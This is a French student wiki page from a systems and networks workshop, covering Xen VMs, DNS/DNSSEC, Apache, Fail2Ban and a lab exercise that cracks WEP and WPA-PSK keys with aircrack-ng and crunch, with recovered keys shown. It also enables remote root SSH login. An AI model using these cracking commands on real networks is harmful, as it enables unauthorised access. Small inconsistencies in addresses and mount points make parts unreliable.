root@SE4-Tompere2:~# ping 2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
PING 2001:660:4401:60a0:216:3eff:fe4b:1909 (2001:660:4401:60a0:216:3eff:fe4b:1909) 56 data bytes&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=1 ttl=64 time=0.293 ms&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=2 ttl=64 time=0.249 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;TomPere 2 reçoit bien une réponse !&lt;br /&gt;
&lt;br /&gt;
=== SSH depuis l'extérieur ===&lt;br /&gt;
Pour pouvoir se SSH depuis l'extérieur, il faut commencer par activer l'option sur les machines.&lt;br /&gt;
&lt;br /&gt;
Pour cela, rien de plus simple, il faut aller dans le fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; des VMs et activer la directive &amp;lt;code&amp;gt;PermitRootLogin&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, l'accès de root à distance est autorisé. On peut donc se '''ssh de TomPere2 vers TomPere1 et inversement''' !&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ssh root@2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;C'est pratique, mais ce n'est pas encore ce que l'on veut.&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, alors il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/var/www/html/index.html&amp;lt;/code&amp;gt;, nous avons modifié le titre pour pouvoir visualiser que les changements étaient bien pris en considération.&amp;lt;syntaxhighlight lang=&amp;quot;html&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Tom et Aurele Page: It works&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
Finalement, nous obtenons bien un accès au site '''tompere2.xyz''' avec le nouveau titre ![[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12358</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12358"/>
		<updated>2026-02-23T13:01:02Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Configuration réseau */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
=== Créer ses  VMs ===&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous devons nous connecter à ''CapBreton'' pour pouvoir y créer nos machines virtuelles.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@capbreton&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, nous utiliserons l'hyperviseur de machine virtuelle Xen pour créer nos VMs.&lt;br /&gt;
&lt;br /&gt;
==== Création ====&lt;br /&gt;
&lt;br /&gt;
Voici la commande permettant de créer ma machine de service. A noter que l'on était initialiement sur la distribution Excalibur, mais nous avons finalement changé pour Daedalus.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4-TomPere2 --dhcp --bridge=pont_pere --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2048M --force&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant que nous avons une machine virtuelle créer, il faut la démarrer et s'y connecter ! C'est ce que permettent les deux commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4-TomPere2.cfg&lt;br /&gt;
xen console SE4-TomPere2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Vérification ====&lt;br /&gt;
Remarque : On peut vérifier que '''les machines virtuelles en cours d’exécution''' grâce à &amp;lt;code&amp;gt;xen list&amp;lt;/code&amp;gt; .&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@capbreton:/var# xen list | grep Tom&lt;br /&gt;
SE4-Tompere1                               389  2048     1     -b----    3574.5&lt;br /&gt;
SE4-Tompere2                               390  2048     1     -b----    3343.2&lt;br /&gt;
SE4-Tompere0                               399  2048     1     -b----    8849.0&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Comme on le voit,  nos 3 machines sont démarrées !&lt;br /&gt;
&lt;br /&gt;
=== Partionnage ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration ====&lt;br /&gt;
On ajoute dans le fichier &amp;lt;code&amp;gt;/etc/xen/SE4-Tompere2.cfg&amp;lt;/code&amp;gt; nos partitions '''home''' et '''var'''.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
    root        = '/dev/xvda2 ro'&lt;br /&gt;
    disk        = [&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/disk.img,xvda2,w',&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/swap.img,xvda1,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-home,xvda3,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-var,xvdb1,w',&lt;br /&gt;
                ]&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Montage des partitions ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvdb1 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le montage des partitions est fait ! On peut par ailleurs le voir via &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;. Cependant, au redémarrage de la VM, les partitions ne seront pas automatiquement montées. Ainsi, il faut modifier le fichier &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
proc            /proc           proc    defaults        0       0&lt;br /&gt;
devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nos partitions '''var''' et '''home''' seront bien montés comme il se doit au démarrage.&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
